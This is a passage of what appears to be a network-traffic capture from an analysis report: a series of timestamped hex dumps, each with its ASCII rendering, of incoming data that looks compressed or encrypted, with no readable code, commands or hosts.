              2022-01-14 10:26:21 UTC1003INData Raw: 59 28 90 4c e0 b1 88 63 c6 6b 2c 2a f2 ee e2 56 31 a7 a9 b9 6e c9 12 71 20 32 30 29 08 2b d5 88 5d 0d 67 d3 ab db 27 c0 e7 f9 4c 9a be 1e 9a 57 5f 48 06 ff 87 19 14 5a d2 d9 30 c8 63 2a 37 86 69 40 ec e8 74 54 b6 e1 cf 21 d6 b8 1d a0 bd 50 97 d9 43 9b d3 51 0a cb fc 6c da b7 9c 25 23 28 45 7a 94 5e 39 7e fc 6f 24 54 2a c3 00 81 fa 78 68 41 5e c0 fb ec 77 f1 de bd 6b 3e 10 73 72 88 7b 86 4c 5d dd 4f 93 68 85 ed 04 8e ef a2 4f 8c 1e 4c fe 72 6d 50 22 a9 11 ce d1 58 c1 08 62 4d 04 89 ea 88 9e de dd 39 84 74 77 e1 4e fe 62 b8 fb 0e f5 e4 80 7f 03 ff 67 32 35 af 6d 9a 32 51 3f e1 ec 1e d4 da ab 87 8a 23 2e df 01 06 93 c3 cf 57 38 16 72 9d 29 71 2a 39 84 6c cd 56 dc a0 3b ae 70 88 75 da 17 8f 34 92 61 57 49 6e 6f 88 0a 65 31 a8 29 bc 11 81 87 16 26 27 74 03 00
              Data Ascii: Y(Lck,*V1nq 20)+]g'LW_HZ0c*7i@tT!PCQl%#(Ez^9~o$T*xhA^wk>sr{L]OhOLrmP"XbM9twNbg25m2Q?#.W8r)q*9lV;pu4aWInoe1)&'t
              2022-01-14 10:26:21 UTC1004INData Raw: 8d a5 38 44 04 f1 68 49 b6 ea 90 8a 7b 17 f1 e4 5c 56 b7 e2 ad 6f 59 51 78 7a f1 6c e0 73 f4 82 eb 1f d1 44 62 dd 6a da aa e8 9c 32 3c df 85 4f 8e 68 b1 f5 38 0a fe 32 40 f0 33 43 8c 6d 32 4f 0e 7d 6f 08 8e 57 95 6e ca 10 49 2f d8 51 87 0a 89 fe 7e fc 8c 1e 50 9a 46 5b 55 51 65 f5 5b 37 2d 27 aa ae f2 63 30 2f 4d d0 cb 31 d2 c0 6d 2b a2 23 7e 16 0e 3a 5b b3 54 84 92 65 76 01 96 60 fc db 5c 77 5c 16 2f 7e 3c 6e 46 ff 8a 83 b2 68 c7 a2 77 74 d2 3e d9 50 b6 7c f6 1c 17 fa b8 11 ef 0e b6 ab e9 d1 d6 ed 73 5f 30 5a bb 31 aa 72 87 fb e7 ad 35 c7 97 64 fd 95 b1 f4 8f 60 b1 e8 d4 c3 39 c5 73 04 47 ee fa 39 d2 8a 36 b2 99 e1 33 ad 40 7d 55 e4 4f ef e5 65 de a9 13 ea f5 06 49 15 88 10 3f 62 6f 4c 01 d7 8f ca cd 5e 9e 20 1e 4f b4 17 fe 1b 8b f6 13 e8 00 13 f5 e5 e2
              Data Ascii: 8DhI{\VoYQxzlsDbj2<Oh82@3Cm2O}oWnI/Q~PF[UQe[7-'c0/M1m+#~:[Tev`\w\/~<nFhwt>P|s_0Z1r5d`9sG963@}UOeI?boL^ O
              2022-01-14 10:26:21 UTC1005INData Raw: 8e 26 2b e7 ce 6e fb fc 77 06 95 b0 fa 8d c3 64 ac 01 69 60 23 01 02 82 6d 24 55 c3 b3 9f b6 fe 21 a2 7d 76 7e 76 97 db 27 d2 a3 d7 3d 63 e5 09 19 1b 7c 0e 10 67 35 e6 62 59 4e f6 79 06 eb 8b 48 83 b7 6d 93 b7 9d ae 02 92 71 7e 9e 23 0f 50 60 77 b1 d4 7e 6d 66 a9 62 16 68 a5 ad 89 90 53 43 5d 52 e6 5e 5c de 1f 6f 3a 07 07 67 fe ed 1b c4 e1 44 01 30 f3 e0 a6 d8 c7 45 72 e0 cd 0f f4 56 5f 43 93 1f 7c f2 b0 1a b1 3b 9f ca 77 88 14 74 bc 38 14 64 f5 06 80 ae ac d3 d1 56 13 e6 2c 6e 86 69 4e b5 9b 2f 47 66 a1 af 8e 30 58 d3 b7 f5 fb f2 b8 ac 7a d0 cc ae 00 db 48 e4 9b 74 3e 78 3f 19 8a d2 e6 85 ff fa 23 df 5a d3 5b 33 ac 94 85 f6 71 44 13 8c 73 03 76 6c 6a f6 01 0d e5 0b 7b dd 3d 91 87 f5 9f a9 b9 14 82 ba be 8f c7 43 8a 00 1f cf 40 f6 eb d7 58 d8 a3 e7 6b ce
              Data Ascii: &+nwdi`#m$U!}v~v'=c|g5bYNyHmq~#P`w~mfbhSC]R^\o:gD0ErV_C|;wt8dV,niN/Gf0XzHt>x?#Z[3qDsvlj{=C@Xk
              2022-01-14 10:26:21 UTC1006INData Raw: 60 a5 1e 64 a2 35 ba 1d 27 f8 6c b2 1e 24 16 0b ae 41 d9 74 e2 a5 99 61 43 9d 7b ab f9 83 eb 2e bb 7f e7 d6 2f d9 ff 7c fd 57 c0 ee 9e 25 36 eb 2f b7 8d d3 3a 46 96 1e 0e 35 e9 64 b0 b2 a1 a9 a1 00 35 d8 d5 40 f1 88 6a b4 c9 cc bc 3c b4 68 7d f2 6f 37 86 95 2c 0e 64 a1 b9 01 53 19 ae 9a 10 37 e3 28 fd 42 02 8a dd ba 95 ab 83 7b de a2 2f 63 a4 58 11 67 77 46 0c 8a 43 8e 4e f4 1f 83 f3 b5 c9 0f a3 cd 54 95 6e ab 8c a8 85 98 3f 93 83 27 c6 e2 64 2e 43 44 de e5 dd d6 79 39 82 6b 33 d8 ee e7 4d b0 58 8c 12 76 25 64 a3 b1 41 28 4a 90 4f e3 f3 fd e6 2a 9b b7 02 31 ee 18 80 9b f8 79 1a 4f 0e 29 d2 90 c9 10 24 3d 9b a8 85 f4 61 87 49 0f 95 d6 d9 eb 12 65 fc f1 6f e1 8b ba 9f 53 0a 9b 4a 17 1c 5b 4e fb 73 1b d1 51 a3 6c f5 f2 69 28 39 85 bc 2d 52 5c 1b c4 7a 9f 0b
              Data Ascii: `d5'l$AtaC{./|W%6/:F5d5@j<h}o7,dS7(B{/cXgwFCNTn?'d.CDy9k3MXv%dA(JO*1yO)$=aIeoSJ[NsQli(9-R\z
              2022-01-14 10:26:21 UTC1008INData Raw: dc b8 0a f3 16 17 e5 69 28 ba c9 4b 68 00 39 f5 bf 73 03 f5 3f 90 be 44 1c 59 40 10 3c 16 64 ae 11 96 42 a8 59 4c f5 18 99 fb fe 6e b1 f8 92 a7 bf 6f 3f 90 3c 17 9c 4a e1 35 13 7a fa c1 a8 3f 99 d3 ba b3 5a cd b7 49 71 1e 44 17 91 9f d6 a5 1a c4 e6 8c aa c0 83 80 6b d5 e4 8f c7 9f 23 ae d8 2c 66 c0 6e 6e a6 63 6b 09 0f 94 b0 d9 5b 9d 47 27 d0 d7 27 62 b2 eb e0 33 b2 0c 74 ee 6c 68 aa 6e a1 86 4e e6 92 92 f1 74 21 5c 89 f3 4f 5b 1d 6e 56 1a 44 6d 5e c2 55 7c 91 c1 da 18 01 40 c2 d2 95 a5 c7 d9 b0 31 bb 54 ad 1b 59 ca 3b 50 f4 bc 3f cd 46 fa 73 8c 66 f0 09 fb 2e bf 70 07 0c fd 37 d7 93 dd 37 9a 57 0b 07 32 6d 84 b2 74 f4 fd f1 4c 10 a8 89 d4 f9 d9 09 35 86 4d 5e fa 4b 5f 78 aa 3a 3d e8 75 05 e7 a8 43 cd f9 ec 9c 2a 5e c2 08 25 c0 ec f5 ec ee e8 83 e8 25 6b
              Data Ascii: i(Kh9s?DY@<dBYLno?<J5z?ZIqDk#,fnnck[G''b3tlhnNt!\O[nVDm^U|@1TY;P?Fsf.p77W2mtL5M^K_x:=uC*^%%k
              2022-01-14 10:26:21 UTC1009INData Raw: 65 fe 69 d2 7d 10 e1 8b f2 69 84 62 7e 2a 91 cb 4c ef ed 4b 63 db 95 ab 6f f6 ba b2 f0 44 07 f4 c7 4f fd db 2c c3 46 01 66 ba 14 32 2f a1 84 a5 9b 42 32 85 54 c6 8e 71 e0 d1 4f 7a 88 73 bc 6c 0a 8d dd 39 7e 4a e1 c7 ea 98 a2 af f4 8c b0 ac 51 8a 18 69 81 df 39 5f d6 a5 5c e3 dd 72 8a 92 87 f1 c4 f7 87 8a 95 d8 a1 bb 70 01 7d 0c 63 22 df b9 6b d5 68 3e 2a f5 d0 c8 d3 57 f3 5a 78 83 e0 b6 e5 46 f5 54 fe 68 59 2d b1 63 a2 58 39 97 e6 d6 5d 10 7d e7 41 80 eb 9b d5 ad bf ff c5 ed 24 5e cb 43 25 60 6e b4 1e 43 61 38 13 0a 78 fd 08 80 40 44 90 60 d5 bc e2 27 50 12 b2 03 f6 ce d9 ba 6d c5 10 61 d9 a3 ba ea b2 08 6e 3d 37 84 6c a6 d1 8f de 07 2d a3 45 c9 45 8f dd 1c 0f 12 1b ca 38 50 fb 13 56 c5 87 2a 24 e7 b4 19 0f c2 6f 98 5a 1e f3 ff 6c 88 6d 8e 50 27 67 91 c0
              Data Ascii: ei}ib~*LKcoDO,Ff2/B2TqOzsl9~JQi9_\rp}c"kh>*WZxFThY-cX9]}A$^C%`nCa8x@D`'Pman=7l-EE8PV*$oZlmP'g
              2022-01-14 10:26:21 UTC1010INData Raw: 48 5a dd 3c 74 b2 6d bd 05 67 94 a9 d9 22 2d 13 a9 c6 ff 80 e1 4d 16 6b e7 2e 4c 7e 98 55 5f 6b 38 33 d0 e7 7d 98 24 23 65 c4 9e 2d d6 24 2c 59 42 ba df 9b ba 66 c7 3a 85 0b 9d ae d1 e7 0e bc 63 25 7f dc 65 cf a9 ca b6 b6 2b 66 ec f2 e8 23 18 ca d8 a0 da fc ab 3a aa f6 03 a6 15 b3 e7 63 95 bf f7 3e 22 57 44 37 74 eb 29 1f 33 c3 6c 07 b1 91 56 c3 bd 11 57 2c bf 01 b4 df a0 31 18 50 f8 de 89 ee 1f d8 ad ed 3e 70 38 61 33 0f 18 0d f5 9e a3 1a ce d3 8d fe 01 72 38 66 50 70 7a fb fb 22 ef 10 d7 21 70 26 d9 25 db e9 ae 6c e6 de 2c 76 7b 24 0b 61 4e 17 de 0d 31 30 e4 1a a1 31 9e d6 f3 ed 74 68 b8 b0 0d e4 85 e3 3f 63 85 8b 93 74 54 cf 58 da bd cc 18 a3 18 c8 65 3d 86 72 95 7b b2 b5 37 41 30 45 65 2f a7 14 d9 8a dc 23 0d 8a 68 bb 74 22 8d 6b 97 6d e1 52 f4 7b 0f
              Data Ascii: HZ<tmg"-Mk.L~U_k83}$#e-$,YBf:c%e+f#:c>"WD7t)3lVW,1P>p8a3r8fPpz"!p&%l,v{$aN101th?ctTXe=r{7A0Ee/#ht"kmR{
              2022-01-14 10:26:21 UTC1012INData Raw: d6 c5 3c c2 14 b9 15 98 40 1f 36 ce 28 24 53 60 de 48 8a e8 9a 9d 5f a7 b2 11 fb fe 14 c9 52 81 5e 2d 3d 94 59 59 48 87 7d e1 22 5b 45 65 3b ad 7f 19 fb fc 72 92 2d 23 34 a2 29 a9 ae 1e 3f 29 89 0d 19 92 5f 52 ff ed eb 48 e1 44 9e 5e 2f 56 54 d0 d9 24 56 b2 a9 e2 a1 4a 98 3a b7 63 b3 90 43 91 de b7 e4 59 3b 37 a3 56 39 eb 1b cc d8 b2 8f e5 e6 5c 15 e4 54 1e 35 f1 f5 be a0 69 ce f4 3f 14 fb 7f ea 16 cf 7f 96 40 19 81 0c 74 f6 8f 86 10 c5 b2 47 75 56 d9 b4 ae 5f 07 ae dd fc 2d aa 4f 19 9e 36 fe 75 02 85 3a be ed 90 e6 c5 7f eb 0e 79 90 4c e8 93 c3 34 77 bd 09 e3 3b 59 9d c8 c6 b1 c8 bd 8f 8c 0b 40 80 31 ae 4a 82 ba 74 c0 ed 5c 0c 05 41 6a 23 ab 36 3c 08 9f a8 f7 b4 60 06 57 04 8f 8d 4f 90 eb 4d 8c 0b 13 5e 4d 06 9a 01 5a 63 84 1d ab 70 55 10 2a 4f 71 52 85
              Data Ascii: <@6($S`H_R^-=YYH}"[Ee;r-#4)?)_RHD^/VT$VJ:cCY;7V9\T5i?@tGuV_-O6u:yL4w;Y@1Jt\Aj#6<`WOM^MZcpU*OqR
              2022-01-14 10:26:21 UTC1013INData Raw: 3e 68 ca 1e fa cb 44 1f c5 00 73 4c f0 ff 9d bd 54 ca cd 53 02 85 e4 8f db 33 6a d8 45 bf 1d b3 e7 1f a5 b4 0e 66 7a 18 14 21 28 1c 06 29 2e 87 3e c2 89 09 0c bd 68 d3 39 88 71 48 e2 cc d7 26 af 53 5a d8 a9 a3 fb f5 8d 77 a2 11 f3 ef 0a 97 ce 9a 55 4e e4 1b e2 fb f6 67 34 38 63 c5 80 68 aa 08 84 08 c1 9a af 95 db 2c 21 d2 a0 2f bb 65 f6 e1 40 58 c1 1a 46 f2 61 ed 7b 03 16 a5 04 97 af 6b 9b f4 7a 88 67 53 78 15 42 1d c1 99 77 78 3a 8c 02 73 d2 e6 90 4e e0 6b 08 c6 83 fd f1 e3 e8 83 3e 6b bc 92 a6 98 29 ba a7 b2 6c 36 4f 10 9d e4 fb 85 ae f2 98 d9 36 3c 1d b2 f4 2f ae 63 44 17 90 56 c3 67 cb 86 01 d5 eb 67 52 56 c6 f7 a3 d7 39 50 e5 08 84 b2 74 72 51 19 9e 49 6f 6a b5 90 47 b0 88 0a c4 a2 6a 4a cd 1e fd 1f 33 b3 87 e6 97 b2 18 d3 2d a1 ae a5 04 f8 c3 71 65
              Data Ascii: >hDsLTS3jEfz!().>h9qH&SZwUNg48ch,!/e@XFa{kzgSxBwx:sNk>k)l6O6</cDVggRV9PtrQIojGjJ3-qe
              2022-01-14 10:26:21 UTC1014INData Raw: 2d a3 52 a1 b4 e5 5e f1 ee c2 e8 7c ce dc 5b bd f9 e5 11 e3 22 b3 d2 d4 c4 28 a4 53 ab 30 57 e6 42 0a 86 6b 5b 41 f7 03 e2 67 3f fb 11 97 32 50 bf 6f 52 19 21 5b e3 f6 d6 a7 a6 4e 48 3d 3a 6f ca 96 39 36 95 57 86 c3 40 65 e7 d0 66 47 8c a2 86 c3 dc 15 88 12 7d 02 00 52 1f 4d 02 92 68 fb 12 2f 07 99 74 39 a1 c0 16 86 c5 da 1b 1a ed 6b 4d 26 b7 de 08 89 92 a4 9d 10 08 33 86 71 07 0c 9b bb 6a 59 d3 a0 81 e7 60 5c b9 6b 2c 35 ee 76 2e 98 a3 2c a2 cf 86 05 c8 dc d6 59 fb 00 1d 3a 87 cd bc 21 d2 26 fe 02 74 52 df 4c 1a 24 9d 44 c4 9b db 07 c4 aa 10 06 40 cd 4d 6b 34 c1 0e 6a 43 43 f5 03 90 f2 14 6d 3a 12 3d 7d b0 84 8a e8 30 cb e1 24 3f 0c 7c e4 78 51 84 fa 98 88 4b 9d 6b 28 c6 57 32 d1 80 53 18 8c 12 fd 08 39 f4 68 91 2a 8d c9 a5 c4 20 19 ec c5 d7 d6 d4 ce b5
              Data Ascii: -R^|["(S0WBk[Ag?2PoR![NH=:o96W@efG}RMh/t9kM&3qjY`\k,5v.,Y:!&tRL$D@Mk4jCCm:=}0$?|xQKk(W2S9h*
              2022-01-14 10:26:21 UTC1016INData Raw: 2a d7 38 d5 49 00 e5 e6 dd 52 9b 4b 7e c1 88 bb 13 1b 6d e6 85 e4 9f 4f 2c 2e cc 97 d0 31 e0 a0 d6 e7 02 74 2e 26 8b fa 71 5e c3 a9 b8 15 a9 2b f4 61 55 3b 94 1b df 5b 55 47 77 d6 a7 b4 17 03 1a 97 65 4d 64 65 22 22 4a f4 2e 52 1c 1a 85 ea 11 f1 98 5e bf 61 5d 1d c7 b8 c5 77 fb 16 e0 bf 7d 63 2c c0 98 4e 0b 3a a1 b5 82 60 b2 ea d3 3d 9e 94 b7 30 39 f5 04 ee 6c cb 49 05 e8 2b a7 59 90 59 23 a6 4e f2 28 e8 91 ce 0b 64 dd e2 34 6f 98 a1 77 6c f8 c4 aa 07 58 d1 a9 d4 c7 20 b8 64 e5 06 d2 d3 00 85 12 b1 9d df cf f3 f6 08 f5 9b c5 c5 4c f6 6b 9f 24 c0 54 45 f0 52 19 29 ae e3 4b 17 93 b6 1f eb 3d 82 66 59 93 c0 9f c1 65 57 60 c3 6f e7 8f a2 79 4a 28 ad dd c7 7b 41 2c db 8b f0 5a cf a3 9e 8b ee d1 32 c0 00 8a 6b 2b bd 16 66 1e 43 92 40 ef 05 7a 41 34 87 ef cd 5d
              Data Ascii: *8IRK~mO,.1t.&q^+aU;[UGweMde""J.R^a]w}c,N:`=09lI+YY#N(d4owlX dLk$TER)K=fYeW`oyJ({A,Z2k+fC@zA4]
              2022-01-14 10:26:21 UTC1017INData Raw: 1e 2c 44 76 e9 19 58 f3 e7 0b 3a 8b 9e df 4a e2 c5 1e 29 ba e8 b5 81 e7 ed c9 3b e8 f4 65 72 bd 72 9f 59 e9 09 79 62 bf 28 02 93 d1 ad 5c a2 fd 46 96 80 67 64 ad 3e 13 15 16 8a 9c 83 20 23 c1 2b d1 a0 c2 30 4e fd f9 8b 8e 55 76 3e 06 99 0b 59 3e 5b 0c 2c cc f4 27 6a 32 90 f5 b8 7a e5 8a d7 d6 55 6a 15 39 4a 9d 59 50 57 4f 80 7b 05 10 1e ac 5d 31 65 97 de ce cc d7 21 96 2b 25 d9 2a 21 c1 22 ae 22 03 ba a4 f2 d9 78 8b fd e0 a6 54 3f 7e 0d f2 60 da c1 27 2e fb 38 02 82 61 58 b8 06 94 48 aa ca 3a fe a2 32 23 cb 00 82 1a 47 7c 83 f2 7a d3 c9 aa d6 a5 b9 77 01 40 0e 03 1c 50 f1 03 00 3b db 34 38 1e dc 15 02 a3 e7 95 8b 06 6b ee 90 55 49 06 6a 6b e0 da ef e1 c9 4f 76 9b cf 0a 65 fe a0 32 0f f2 6b 25 98 45 25 dc 5f 24 83 8c 02 9d 73 10 63 3e c4 40 b5 6a 66 67 2e
              Data Ascii: ,DvX:J);errYyb(\Fgd> #+0NUv>Y>[,'j2zUj9JYPWO{]1e!+%*!""xT?~`'.8aXH:2#G|zw@P;48kUIjkOve2k%E%_$sc>@jfg.
              2022-01-14 10:26:21 UTC1018INData Raw: fb 7a aa 01 03 eb b3 97 b6 04 25 c3 77 0c 9c 8e 50 13 96 22 4e 79 68 c7 3b 88 c8 c3 65 27 20 e6 90 26 3a 0b e3 07 15 ef b7 24 98 eb 08 9a 47 60 88 81 de f0 15 33 b3 85 48 5b 26 70 91 24 35 40 09 bf 72 e2 b2 1c 5f 22 cf e3 6b 32 35 b9 6b 5f b7 69 0a 9b d3 59 37 d5 a3 1e 63 39 80 6b 3f 9f bb 76 82 9a 1f b2 72 87 ba fc 7c 99 da 27 ad 7e 6f 0d e8 97 c0 93 a8 3e 5a dc ad 82 36 22 49 62 ae e5 aa 3e 05 1c 51 1d 3c a2 1e 2f b1 df 3e 13 f4 80 ba 97 86 77 40 0f a0 26 1d cb b9 ce c3 13 05 bc 80 93 aa 39 7a ed 05 ec f4 1b ac 7f 82 e2 61 40 7e 85 f7 e8 0c bf 68 a4 2c 20 4e 71 a1 a3 17 e5 1f cc 7a 3c 05 18 64 bc e7 be 47 64 a0 35 a5 bf 6a f8 54 c3 67 e1 05 cc 42 bb b2 aa 7e 71 80 33 48 52 1e 6c ea 32 4b 8e 24 c0 4c 5a b4 eb 1e 9f ba 97 d6 ba e2 7f 66 e9 1a 59 50 fa 00
              Data Ascii: z%wP"Nyh;e' &:$G`3H[&p$5@r_"k25k_iY7c9k?vr|'~o>Z6"Ib>Q</>w@&9za@~h, Nqz<dGd5jTgB~q3HRl2K$LZfYP
              2022-01-14 10:26:21 UTC1020INData Raw: ef 71 19 bd 7a 9d a6 97 6b 21 21 24 89 f2 71 0c 69 53 1b d6 e5 24 49 7e d0 b8 07 0c 61 b2 bc f3 e4 91 cf 33 55 9f cb 21 a9 ba 62 ae 0b ee 67 53 1e 26 36 29 42 22 4c e8 53 f7 7f ad 87 1e e6 83 eb 01 02 c1 00 e8 96 98 4d 78 96 f8 db 2a d6 55 9b dd 2f a1 b9 1e 2b ad eb 3b 8e 4f 26 35 af 91 c0 14 98 45 6f 22 5d 34 da 0a e9 76 f7 f0 cd 59 5c c3 8f 10 0f 8f 93 d1 ae 6e c6 86 15 ec e5 18 7c 93 38 af f5 9f dd 23 77 2e 29 ba 4a 5e 4e bb 85 d1 07 ae 4b 6c 43 61 5d 50 f7 ed 41 e4 e8 90 70 9f ae 09 ca 77 19 18 98 ff e8 9c 30 20 26 23 d7 99 e2 a1 a3 66 1f a5 fd 96 4d 75 01 f5 4b 70 82 65 24 2f 4e 53 02 e5 6b 33 d3 4d 73 0d 1c 2a 50 86 39 88 8a d8 d8 c7 35 a4 b3 94 4e e2 11 57 2a ba 52 a4 4c fa 7a 86 3c 97 25 24 5a db 21 db 54 d3 f4 74 8f d6 a6 89 86 84 bd 37 f4 63 38
              Data Ascii: qzk!!$qiS$I~a3U!bgS&6)B"LSMx*U/+;O&5Eo"]4vY\n|8#w.)J^NKlCa]PApw0 &#fMuKpe$/NSk3Ms*P95NW*RLz<%$Z!Tt7c8
              2022-01-14 10:26:21 UTC1021INData Raw: 57 b2 a5 50 da ff 4d 86 e6 86 3b b6 78 78 97 77 11 82 7b 06 88 19 34 b2 55 5e c8 c3 72 e6 61 a2 a0 3c 06 90 26 12 88 a9 3e 10 7d 10 69 fa 58 c5 62 a4 bb 1d cd 4d 19 ee 8b e1 34 39 79 54 ba 46 57 3e e2 65 16 ab 8d c2 f1 2e 24 53 75 fb 53 75 a5 08 e5 d9 cf 53 7a 8d 66 40 e4 7e 75 73 da 0f e4 87 f7 bd 26 8a 04 6e 66 82 63 3d 9d 5a 75 ef 62 b0 14 69 d2 4d 6a bd 93 3e ed 75 13 f9 81 bf 72 d1 49 0a de ac 6f 92 5b 56 94 90 21 2a f4 da d2 de a8 23 04 04 92 47 0e 9f 74 66 de b6 17 bb 76 cb 48 9f f5 e3 b1 4c f0 98 1e 91 ac ed bb e7 78 8b e2 a7 fd 6e a0 20 aa f7 0f 84 6a a9 64 2f 64 c4 b4 1b 89 fc 0d a5 a2 5c 01 07 12 c2 7e e1 95 59 cb 34 2b b9 67 d8 0f 53 05 1a 40 6d 9e 29 aa 07 0f 38 b8 96 23 cf 50 eb 71 ad 8c 79 06 90 9a e7 7a 3b 92 5a d7 2d d7 76 ec 6c c1 5e ba
              Data Ascii: WPM;xxw{4U^ra<&>}iXbM49yTFW>e.$SuSuSzf@~us&nfc=ZubiMj>urIo[V!*#GtfvHLxn jd/d\~Y4+gS@m)8#Pqyz;Z-vl^
              2022-01-14 10:26:21 UTC1023INData Raw: ca a9 cd a2 59 d0 58 e0 05 01 9e 57 ab 7e 14 1b 97 be b7 86 91 b3 72 00 98 ec 87 66 3a b8 66 42 1a f5 b9 41 ff 99 e7 42 de e7 9f b7 7f 8e 79 1b 10 f3 d8 35 da 84 29 ab dd 95 b0 a9 57 26 f8 ba 1f b6 2c 27 3b 74 77 f5 11 05 40 49 3b 7a a9 e2 3c 2e 0b 9b 22 5d a8 97 a1 55 9c 5f 2d eb 8a 6e 10 7e e4 d7 7a 6c ed 77 4b 05 f3 1f 4d d5 41 87 92 b9 8f e0 6b 29 a7 db 30 4e da a8 38 82 be 51 df 3b 8c 61 4c fa 68 49 ba 5b 85 ec 92 ef 92 2d ef 14 80 96 75 a5 b6 11 8f 30 d0 70 ab 1d cf 54 a6 89 f5 e3 2c 33 b0 cb 6f 23 cb e6 5b ee 4f 79 08 89 bc ef 7d 1d e0 b5 8c 74 52 48 8a 9c 99 87 a0 6d f9 45 6d 4f 3e 7a 70 da dc e0 cb be 4c 43 46 ed 16 1d 33 47 57 d7 22 59 21 d3 af 56 cc ae 46 27 21 9d d0 8f b1 75 f3 11 3a 10 68 c8 25 7a a7 11 ea 9c 47 72 bd 4e f2 64 1d 1a c3 af 8c
              Data Ascii: YXW~rf:fBABy5)W&,';tw@I;z<."]U_-n~zlwKMAk)0N8Q;aLhI[-u0pT,3o#[Oy}tRHmEmO>zpLCF3GW"Y!VF'!u:h%zGrNd
              2022-01-14 10:26:21 UTC1024INData Raw: c8 f1 1b c8 c2 22 5a 31 4c 0b 1d a5 1a 60 de b9 7f 4f f6 1b bb 7c 94 53 12 ba df 36 26 5d 4f 8b c2 ff fe ae a3 13 9f a4 2a 59 e2 0b eb 1f d2 3f e8 84 93 88 07 55 28 df e9 06 9c 28 2f c3 11 12 93 eb 0e 78 9e 3f af b5 97 dd 70 8a 94 b3 84 6f 31 b6 60 22 e9 46 44 0f e0 2c 02 d3 33 fe 8c 85 92 4b 66 bd 68 38 27 d2 d5 19 f5 e9 20 5e df 96 d8 c3 a1 be 88 39 cf 1c 9a 27 50 27 f9 44 03 10 75 0b f8 6a 46 6d dd 4a f2 71 1a 68 ec 8d c4 9c c1 a1 4c 96 56 ca 86 73 40 1f a6 6a a6 c4 af 86 71 a9 0e 16 80 b0 b6 64 a8 25 02 0c 3f 00 70 64 5c ab 93 d5 0d 31 d3 14 cc 91 cf 02 86 0d a0 32 64 ed 15 fd 1a 50 24 ef 63 fa 7b 42 76 cc d6 fb f4 02 84 fd 85 e2 a2 fb 46 e8 e9 40 07 53 75 03 21 82 dd 3e 1a 5b 53 32 d3 64 e6 31 f6 fe c7 14 8d fd a0 a8 ee d5 91 0b f5 1c 30 c8 de 1d cf
              Data Ascii: "Z1L`O|S6&]O*Y?U((/x?po1`"FD,3Kfh8' ^9'P'DujFmJqhLVs@jqd%?pd\12dP$c{BvF@Su!>[S2d10
              2022-01-14 10:26:21 UTC1025INData Raw: 24 26 59 41 d7 44 43 64 0e aa 7d 1d cc 94 f5 ea 97 d4 cc 8f 9c e1 70 60 0d 7f 99 c1 79 54 72 85 ff fa 6a e4 c0 7f b1 ca 59 fd af cc 42 7c 1a c1 2d c8 27 da c7 a6 63 5c 00 05 81 98 55 5a c8 83 41 62 73 3c 04 9a 5a 63 99 b8 71 09 01 08 ce 16 d2 5b 37 e9 09 15 fd 4c 5f 96 3f 8b f2 79 0d f9 ec c4 8b 07 f5 27 ab 99 c7 21 a4 36 e0 b9 6d 39 2a e5 67 57 55 2d a0 3e 1c 94 8f d0 0a 29 66 dc a9 a6 25 95 74 17 43 ac 1c 44 1e 5a 92 28 48 f6 be e2 ba eb c1 ce d5 31 b2 a3 b6 15 fe ac b4 12 be 20 20 54 95 47 08 9f a3 a6 33 ae a3 08 81 47 d8 65 5e c1 72 85 b3 fb b2 10 39 ee 64 5e 4e 97 d5 45 06 f9 f8 0b b1 8c 70 58 7c e0 48 4c 36 4b 6c b3 f5 fe 11 a9 b7 98 86 fc 6d 69 6c 39 19 81 99 6b 3f 83 e3 26 e0 d7 2f 6d 98 50 cc 3b f9 17 56 b2 ee 84 c8 d0 b7 fe e1 8c 2e f5 80 94 ef
              Data Ascii: $&YADCd}p`yTrjYB|-'c\UZAbs<Zcq[7L_?y'!6m9*gWU->)f%tCDZ(H1 TG3Ge^r9d^NEpX|HL6Klmil9k?&/mP;V.
              2022-01-14 10:26:21 UTC1029INData Raw: 62 dc d4 ba e4 54 3d 9e 35 68 22 22 a8 e4 da b8 14 7c e0 d8 ba aa b2 1e 40 c4 42 68 f5 bc b8 ee a2 7d ad d5 f3 02 70 81 e8 85 ec ef 79 fd 0d e6 8b ee 81 fe 4f ff e7 0d 00 55 11 f3 eb 04 d1 29 43 69 31 b4 18 79 6e c3 1f d9 fc 47 6f 2d 48 47 04 8f cc c5 d8 2f da 02 00 f0 48 0a 9e 22 41 6e 1b 9d b6 17 f6 cf b7 b3 91 db 33 e6 f1 e0 54 0f 9c 2a 27 8d 56 2b 09 47 72 92 59 2f c2 93 d4 b8 3f 93 d9 87 45 02 6a 5a 5a b7 92 53 80 7d fb 08 dd 4f 6c b5 d1 50 88 19 04 6b 6e b2 05 0e 0e 19 fb bf 4e e5 0e b3 17 96 b5 9f c5 d8 ae 7f 34 a7 b2 13 fb 16 db 8d 3a f2 3b 81 ea 82 99 3d cc d7 29 a7 c6 1b 6a ec 85 fb f2 1e 3b eb 72 9f 4b 88 74 93 33 4e af 9f b9 60 2a dc eb 1e 5f 50 90 2a 23 ff 7e 91 cd d6 a0 68 b6 e4 2a 3b ef e2 61 46 30 2b d7 48 07 87 e0 a2 d2 61 5e dc 5e 07 5a
              Data Ascii: bT=5h""|@Bh}pyOU)Ci1ynGo-HG/H"An3T*'V+GrY/?EjZZS}OlPknN4:;=)j;rKt3N`*_P*#~h*;aF0+Ha^^Z
              2022-01-14 10:26:21 UTC1033INData Raw: e8 6e fd 8b be ec 71 51 7d e2 f2 1f 27 c3 1c e8 f3 bd 0a 61 0e fd e5 d7 f1 56 a0 6f 3b 02 0e 7f e6 76 e0 c6 5d b7 f0 0d 1c 44 6f e5 b1 8f 69 54 53 58 96 a5 01 58 9c d1 76 df 8d 88 20 4f 67 77 b6 20 3d bf fb f3 51 1f 26 58 12 70 1c 5c d0 c5 00 f4 36 f1 1b 88 da 51 d4 8d d0 c7 4f 2a 49 91 0f fc f8 b6 4f 76 8f ce cf 52 6c 0c 70 87 b9 fe 99 21 f5 f6 60 d5 0e 04 20 e6 a2 2a 2d bc eb 0b 9d 2a 3f 91 08 14 97 0c 41 dd cd e5 11 17 27 c3 9f 75 16 99 04 98 0c 8b 5d 5e 3c ac 01 eb ca b4 b4 9e 53 c2 38 b3 49 41 0a d7 62 f2 d1 f6 4a 4e b0 52 3f 53 d4 f7 ed 9a 8a 6f a8 e6 29 6d da c9 4a 84 d1 66 b1 b2 70 a8 e7 24 23 0f 58 98 d0 77 14 b2 5b 97 1c ea 8c 3d e5 e4 57 66 5a 14 1a 47 68 4b c9 57 ad 28 50 07 72 e1 58 58 c7 5d 49 d6 bb 78 4f cf 5a 62 13 97 04 5b 5c cd 53 d5 5e
